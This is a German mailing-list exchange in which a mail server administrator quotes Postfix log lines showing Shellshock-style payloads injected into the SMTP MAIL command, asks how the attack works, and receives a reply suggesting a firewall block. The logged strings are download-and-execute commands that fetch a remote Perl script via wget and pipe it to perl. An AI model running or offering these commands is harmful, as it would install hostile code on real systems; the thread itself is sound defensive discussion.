On 04.06.2023 20:39, Joerg Hartmann wrote:
Hallo,in letzter Zeit habe ich häufiger Logeinträge der folgenden Form:May 28 15:57:04 www postfix/smtpd[7094]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 136.243.150.82/das|perl> May 31 06:40:12 www postfix/smtpd[7307]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/pax|perl> Jun 1 14:51:50 www postfix/smtpd[18260]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/pax|perl> Jun 1 21:06:28 www postfix/smtpd[20438]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/ipax|perl> Jun 2 15:43:35 www postfix/smtpd[25713]: warning: Illegal address syntax from unknown[104.200.146.36] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/ipax|perl>Offensichtlich ist dies eine Art "SMTP-Injection" Attacke, bei der eine lokale Shell gestartet werden soll um per wget eine Datei zu holen, die zu perl gepiped wird. Das per wget abzuholende File ist ein Perl-Script von ca. 20KByte Größe mit "unfreundlichem" Inhalt.Ich kann jedoch nicht erkennen, welche Stelle des "SMTP-Dialogs" hier angegriffen wird. "Illegal address" deutet (für mich) eher auf die FROM oder RECIPT TO Kommandos hin. Kann jemand das besser erläutern?Danke! Grüße Jörg
Hallo, hier wird offentsichtlich an Stelle des üblichen MAIL FROM: <[email protected]> derartiger Käse veranstaltet; f. den Fall, dass Du aus diesem Bereich keine Mails erwartest, einfach den Adressrange 104.200.128.0/19 in der Firewall sperren; Grüße, Walter
smime.p7s
Description: S/MIME Cryptographic Signature
